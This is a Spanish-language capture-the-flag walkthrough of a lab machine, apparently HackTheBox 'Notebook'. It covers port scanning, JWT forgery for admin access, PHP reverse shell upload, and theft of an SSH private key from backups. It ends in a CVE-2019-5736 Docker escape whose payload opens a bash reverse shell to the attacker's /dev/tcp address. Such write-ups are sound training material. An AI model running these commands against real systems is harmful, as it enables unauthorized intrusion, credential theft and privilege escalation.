nmap -A -p- -oA notebook 10.129.183.202 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210715100743.png

nmap -sC -sV -O -p- -oA notebook 10.129.183.202

nmap -sU -O -p- -oA notebook-udp 10.129.183.202

nikto -h 10.129.183.202:80

gobuster dir -k -u http://10.129.183.202/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Nos metemos a la pagina web http://10.129.183.202

Pasted image 20210715063205.png

Le damos click en register y nos registramos

Pasted image 20210715063145.png

Le damos click a Add new notes

Pasted image 20210715063235.png

Con el inspector de dev tools vamos a Application-> Cookies y vemos el valor que esta en auth

Pasted image 20210715063355.png

Creamos una llave con los siguientes comandos:

openssl genrsa -out privKey.key 2048

xclip -sel c < privKey.key

Pasted image 20210715075900.png

Vamos a la pagina https://jwt.io/ y le damos click a debugger. Copiamos lo que habiamos encontrado en auth y lo ponemos en donded dice Encoded.

Pasted image 20210715064156.png

Esta es la primera parte del Token.

Pasted image 20210715064730.png

Vamos a https://jwt.io/ y cambiamos localhost a la ip de Kali

Pasted image 20210715101823.png

Esta es la segunda parte del Token.

Pasted image 20210715064839.png

Vamos a https://jwt.io/ y cambiamos 0 por 1 para admin_cap

Pasted image 20210715064952.png

Copiamos todo lo que se encuentra en encoded

Pasted image 20210715102117.png

Y lo metemos de nuevo en auth en Cookies

Pasted image 20210715080017.png

Le damos click en upload

Pasted image 20210715080535.png

locate php-reverse-shell.php

cp /usr/share/webshell/php/php-reverse-shell.php .

Cambiamos la ip y el puerto a la ip de kali y cualquier puerto en este vamos a usar 5555

Pasted image 20210715080906.png

nc -lvnp 5555

Subimos el archivo

Le damos click a View

Pasted image 20210715080948.png

python3 -c 'import pty; pty.spawn("/bin/bash")'

Pasted image 20210715081739.png

Pasted image 20210715082315.png

mkdir -p /tmp/backups

cd /var/backups

tar -zxvf home.tar.gz -C /tmp/backups

Pasted image 20210715082833.png

cat /tmp/backups/home/noah/.ssh/id_rsa

Pasted image 20210715083041.png

Copiamos el resultado y creamos un archivo en kali llamado id_rsa

Pasted image 20210715083249.png

sudo -l

Vemos que corriendo docker no se necesita una contrasena. Para esto siempre es bueno GTFObins

Pasted image 20210715083804.png

https://www.exploit-db.com/exploits/46369

Buscamos en exploit.db si tienen un exploit para docker. Y vemos que tienen una para la version que tenemos.

CVE-2019-5736 poc en google

https://github.com/Frichetten/CVE-2019-5736-PoC

Bajamos y modificamos el archivo main.go

Pasted image 20210715084623.png

Cambiamos el payload para que diga lo siguiente:

'#!/bin/bash \n bash -i >&/dev/tcp/10.10.xx.xx/1234 0>&1'

Pasted image 20210715084736.png

Pasted image 20210715084935.png

Guardamos estos cambios en el archivo llamado main.go

go build main.go

nc -lvnp 1234

python3 -m http.server 80

Pasted image 20210715085408.png

	sudo docker exec -it webapp-dev01 bash

wget http://10.10.xx.xx/main

.\main

sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

nc -lvnp 1234

Pasted image 20210715085822.png

Pasted image 20210715100517.png

boxes

copyright©2022 Cu3rv0x all rights reserved